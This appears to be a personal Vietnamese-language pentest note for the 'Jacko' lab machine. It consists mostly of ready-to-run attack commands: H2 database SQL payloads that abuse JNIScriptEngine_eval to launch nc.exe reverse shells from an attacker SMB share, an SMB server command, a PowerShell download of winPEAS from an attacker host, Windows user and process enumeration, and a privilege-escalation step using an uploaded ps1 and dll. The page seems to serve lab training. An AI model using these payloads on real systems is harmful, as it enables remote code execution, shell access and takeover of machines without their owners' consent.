Skip to main content

jacko

#Jacko - h2 exploit - craft

2 cách

Cách 1

-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\Z").next()');

python2 smbserver.py -smb2support Share /home/kali/ https://www.exploit-db.com/exploits/49384

-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.45.250/nc.exe -e cmd.exe 192.168.45.250 4444").getInputStream()).useDelimiter("\Z").next()');

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("//192.168.45.250/khoa/shell.exe").getInputStream()).useDelimiter("\\Z").next()');

set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

hint get all users

Get-LocalUser | ForEach-Object { "$env:COMPUTERNAME\$($_.Name)" }

Get-CimInstance Win32_Process |
Select-Object Name, CommandLine |
Format-List

$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://192.168.49.103/winPEASx86.exe","C:\users\tony\winPEASx86.exe") https://www.exploit-db.com/exploits/49382

Upload ps1 file và .dll to desktop , sau đó thực thi ps1 fiel lấy quyèn